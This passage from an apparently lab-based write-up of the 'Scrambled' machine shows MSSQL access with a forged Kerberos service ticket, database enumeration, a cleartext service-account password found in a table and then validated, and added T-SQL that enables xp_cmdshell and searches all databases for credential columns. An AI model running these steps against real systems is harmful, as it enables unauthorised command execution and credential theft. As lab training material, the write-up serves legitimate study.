administrator Session
Using the forged TGS ticket, I can authenticate directly to the target MSSQL instance as the administrator user.
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=administrator.ccache impacket-mssqlclient scrm.local/@dc1.scrm.local -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] envchange(database): Old Value: master, New Value: master
[*] envchange(language): Old Value: , New Value: us_english
[*] envchange(packetsize): Old Value: 4096, New Value: 16192
[*] info(dc1): Line 1: Changed database context to 'master'.
[*] info(dc1): Line 1: Changed language setting to us_english.
[*] ack: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
The session above shows that the forged TGS ticket was accepted by the MSSQL instance. Authentication here happens directly between the client and the MSSQL service: the forged service ticket is presented as proof of the user's identity and the service validates it with its own service account key. The Key Distribution Center (KDC) is not contacted at this stage, since the TGS ticket was forged and saved offline.
sysadmin
SQL (SCRM\administrator dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1
As expected, the impersonated administrator user is a member of the sysadmin fixed server role on the MSSQL server.
Because the impersonated administrator is a sysadmin, OS command execution is available through xp_cmdshell.
While this could be leveraged to gain the initial foothold on the target system, I will first explore the MSSQL server further.
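As an added example (not part of the original writeup), the T-SQL below shows the checks and the configuration change a sysadmin needs before xp_cmdshell can be used, run from the same impacket-mssqlclient session. The OS account returned by `whoami` is the SQL Server service account, which is not known from the page and is therefore queried rather than assumed.

```sql
-- Added example, not from the original page.
-- Step 1: confirm the login and its server role membership.
SELECT SYSTEM_USER AS login_name,
       USER_NAME()  AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Step 2: record the current state of both options before touching them
-- (value_in_use = 1 means enabled), so they can be restored afterwards.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Step 3: enable xp_cmdshell. 'show advanced options' must be on first,
-- and RECONFIGURE applies each change. Requires sysadmin (or ALTER SETTINGS).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Step 4: run an OS command. Output is returned as one row per line of
-- stdout; the account shown is the SQL Server service account.
EXEC xp_cmdshell 'whoami';

-- Step 5: restore the previous state once finished.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

impacket-mssqlclient also ships the shell helpers `enable_xp_cmdshell`, `xp_cmdshell <command>` and `disable_xp_cmdshell`, which issue the same sp_configure calls; the explicit statements above make it clear what is being changed on the server and leave a record of the original configuration values.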
Databases
SQL (SCRM\administrator dbo@master)> SELECT name from master..sysdatabases;
name
----------
master
tempdb
model
msdb
ScrambleHR
There is a single non-default database: ScrambleHR.
ScrambleHR DB
SQL (SCRM\administrator dbo@master)> SELECT table_name FROM ScrambleHR.information_schema.tables;
table_name
----------
Employees
UserImport
Timesheets
ScrambleHR.Employees Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.Employees;
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
The ScrambleHR.Employees table is empty.
ScrambleHR.UserImport Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
The ScrambleHR.UserImport table contains a CLEARTEXT credential for the miscsvc account.
The column names (LdapUser, LdapPwd, LdapDomain, RefreshInterval) suggest that the account is used for a scheduled LDAP user import.
Additionally, the miscsvc account was already identified as a valid user within the target domain during the BloodHound session.
The credential must be validated first.
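Selecting from each table by hand works for one small database, but the same finding can be made generically. The T-SQL below is an added example (not from the original writeup) that lists every column in every non-default database whose name looks credential-bearing, across all user databases rather than just ScrambleHR; the LIKE patterns are my assumption about common naming conventions and only metadata is read, so nothing is dumped until a column is chosen.

```sql
-- Added example, not from the original page.
-- Build one query per online user database (database_id > 4 skips
-- master, tempdb, model and msdb) and join them with UNION ALL.
DECLARE @sql NVARCHAR(MAX) = N'';

SELECT @sql = @sql + N'
SELECT ' + QUOTENAME(name, '''') + N' AS database_name,
       TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM ' + QUOTENAME(name) + N'.INFORMATION_SCHEMA.COLUMNS
WHERE COLUMN_NAME LIKE ''%pass%''
   OR COLUMN_NAME LIKE ''%pwd%''      -- matches LdapPwd in ScrambleHR.dbo.UserImport
   OR COLUMN_NAME LIKE ''%secret%''
   OR COLUMN_NAME LIKE ''%cred%''
   OR COLUMN_NAME LIKE ''%token%''
UNION ALL'
FROM sys.databases
WHERE database_id > 4
  AND state_desc = 'ONLINE';

-- Guard against a server with no user databases, strip the trailing
-- UNION ALL, and execute the generated statement.
IF LEN(@sql) > 0
BEGIN
    SET @sql = LEFT(@sql, LEN(@sql) - LEN(N'UNION ALL'));
    EXEC sp_executesql @sql;
END;
```

Note that impacket-mssqlclient sends each typed line as its own batch, so a script that declares a variable must be entered as a single line (or run through sqlcmd or another client that submits whole batches). On this target the result would point straight at ScrambleHR.dbo.UserImport.LdapPwd, which is what the manual SELECT above found.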
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ impacket-getTGT scrm.local/miscsvc@dc1.scrm.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: ScrambledEggs9900
[*] Saving ticket in miscsvc@dc1.scrm.local.ccache
TGT generated.
The credential of the miscsvc account is validated.
This may be used for lateral movement to the miscsvc account.
ScrambleHR.Timesheets Table
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR.dbo.Timesheets;
EmployeeID TimeStart TimeEnd
---------- --------- -------
The ScrambleHR.Timesheets table is empty.